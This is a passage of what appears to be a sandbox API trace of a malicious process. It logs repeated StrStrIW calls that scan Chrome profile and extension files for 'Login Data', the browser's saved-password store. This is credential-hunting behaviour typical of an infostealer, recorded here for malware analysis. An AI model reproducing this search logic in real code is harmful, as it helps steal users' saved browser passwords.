Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json", lpSrch="Login Data") returned 0x0 [0161.874] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json", lpSrch="Login Data") returned 0x0 [0161.875] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json", lpSrch="Login Data") returned 0x0 [0161.875] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json", lpSrch="Login Data") returned 0x0 [0161.876] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pl\\messages.json", lpSrch="Login Data") returned 0x0 [0161.876] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_BR\\messages.json", lpSrch="Login Data") returned 0x0 [0161.877] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json", lpSrch="Login Data") returned 0x0 [0161.877] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json", lpSrch="Login Data") returned 0x0 [0161.878] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json", lpSrch="Login Data") returned 0x0 [0161.878] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json", lpSrch="Login Data") returned 0x0 [0161.879] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json", lpSrch="Login Data") returned 0x0 [0161.879] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json", lpSrch="Login Data") returned 0x0 [0161.880] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json", lpSrch="Login Data") returned 0x0 [0161.880] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json", lpSrch="Login Data") returned 0x0 [0161.881] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json", lpSrch="Login Data") returned 0x0 [0161.881] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json", lpSrch="Login Data") returned 0x0 [0161.882] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json", lpSrch="Login Data") returned 0x0 [0161.882] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json", lpSrch="Login Data") returned 0x0 [0161.883] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json", lpSrch="Login Data") returned 0x0 [0161.883] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json", lpSrch="Login Data") returned 0x0 [0161.886] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png", lpSrch="Login Data") returned 0x0 [0161.886] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json", lpSrch="Login Data") returned 0x0 [0161.888] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json", lpSrch="Login Data") returned 0x0 [0161.889] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json", lpSrch="Login Data") returned 0x0 [0161.889] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ca\\messages.json", lpSrch="Login Data") returned 0x0 [0161.890] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json", lpSrch="Login Data") returned 0x0 [0161.891] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json", lpSrch="Login Data") returned 0x0 [0161.892] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json", lpSrch="Login Data") returned 0x0 [0161.892] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json", lpSrch="Login Data") returned 0x0 [0161.896] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json", lpSrch="Login Data") returned 0x0 [0161.896] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json", lpSrch="Login Data") returned 0x0 [0161.897] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json", lpSrch="Login Data") returned 0x0 [0161.897] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json", lpSrch="Login Data") returned 0x0 [0161.898] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json", lpSrch="Login Data") returned 0x0 [0161.898] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\he\\messages.json", lpSrch="Login Data") returned 0x0 [0161.898] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json", lpSrch="Login Data") returned 0x0 [0161.900] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hr\\messages.json", lpSrch="Login Data") returned 0x0 [0161.901] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json", lpSrch="Login Data") returned 0x0 [0161.901] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json", lpSrch="Login Data") returned 0x0 [0161.902] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json", lpSrch="Login Data") returned 0x0 [0161.902] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json", lpSrch="Login Data") returned 0x0 [0161.903] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json", lpSrch="Login Data") returned 0x0 [0161.903] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json", lpSrch="Login Data") returned 0x0 [0161.904] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json", lpSrch="Login Data") returned 0x0 [0161.904] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json", lpSrch="Login Data") returned 0x0 [0161.905] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json", lpSrch="Login Data") returned 0x0 [0161.905] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json", lpSrch="Login Data") returned 0x0 [0161.906] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json", lpSrch="Login Data") returned 0x0 [0161.906] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json", lpSrch="Login Data") returned 0x0 [0161.907] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json", lpSrch="Login Data") returned 0x0 [0161.907] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json", lpSrch="Login Data") returned 0x0 [0161.908] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json", lpSrch="Login Data") returned 0x0 [0161.908] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json", lpSrch="Login Data") returned 0x0 [0161.909] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json", lpSrch="Login Data") returned 0x0 [0161.909] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json", lpSrch="Login Data") returned 0x0 [0161.909] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json", lpSrch="Login Data") returned 0x0 [0161.910] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json", lpSrch="Login Data") returned 0x0 [0161.910] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json", lpSrch="Login Data") returned 0x0 [0161.911] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json", lpSrch="Login Data") returned 0x0 [0161.911] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json", lpSrch="Login Data") returned 0x0 [0161.912] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json", lpSrch="Login Data") returned 0x0 [0161.912] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json", lpSrch="Login Data") returned 0x0 [0161.914] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png", lpSrch="Login Data") returned 0x0 [0161.914] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png", lpSrch="Login Data") returned 0x0 [0161.914] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html", lpSrch="Login Data") returned 0x0 [0161.915] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js", lpSrch="Login Data") returned 0x0 [0161.915] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json", lpSrch="Login Data") returned 0x0 [0161.916] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json", lpSrch="Login Data") returned 0x0 [0161.917] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json", lpSrch="Login Data") returned 0x0 [0161.917] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json", lpSrch="Login Data") returned 0x0 [0161.918] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json", lpSrch="Login Data") returned 0x0 [0161.918] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json", lpSrch="Login Data") returned 0x0 [0161.919] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json", lpSrch="Login Data") returned 0x0 [0161.919] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json", lpSrch="Login Data") returned 0x0 [0161.920] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json", lpSrch="Login Data") returned 0x0 [0161.920] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json", lpSrch="Login Data") returned 0x0 [0161.921] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json", lpSrch="Login Data") returned 0x0 [0161.921] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json", lpSrch="Login Data") returned 0x0 [0161.943] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json", lpSrch="Login Data") returned 0x0 [0161.943] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json", lpSrch="Login Data") returned 0x0 [0161.984] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json", lpSrch="Login Data") returned 0x0 [0161.984] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json", lpSrch="Login Data") returned 0x0 [0162.053] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json", lpSrch="Login Data") returned 0x0 [0162.056] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json", lpSrch="Login Data") returned 0x0 [0162.071] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hu\\messages.json", lpSrch="Login Data") returned 0x0 [0162.072] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\id\\messages.json", lpSrch="Login Data") returned 0x0 [0162.073] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\messages.json", lpSrch="Login Data") returned 0x0 [0162.074] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json", lpSrch="Login Data") returned 0x0 [0162.111] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json", lpSrch="Login Data") [0162.111] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ko\\messages.json", lpSrch="Login Data") returned 0x0 [0162.111] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json", lpSrch="Login Data") returned 0x0 [0162.171] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json", lpSrch="Login Data") returned 0x0 [0162.171] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json", lpSrch="Login Data") returned 0x0 [0162.218] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json", lpSrch="Login Data") returned 0x0 [0162.220] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json", lpSrch="Login Data") returned 0x0 [0162.259] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\messages.json", lpSrch="Login Data") returned 0x0 [0162.260] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_BR\\messages.json", lpSrch="Login Data") returned 0x0 [0162.285] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pt_PT\\messages.json", lpSrch="Login Data") returned 0x0 [0162.285] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\messages.json", lpSrch="Login Data") returned 0x0 [0162.289] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json", lpSrch="Login Data") returned 0x0 [0162.289] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\messages.json", lpSrch="Login Data") returned 0x0 [0162.290] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\messages.json", lpSrch="Login Data") returned 0x0 [0162.290] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\messages.json", lpSrch="Login Data") returned 0x0 [0162.291] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS 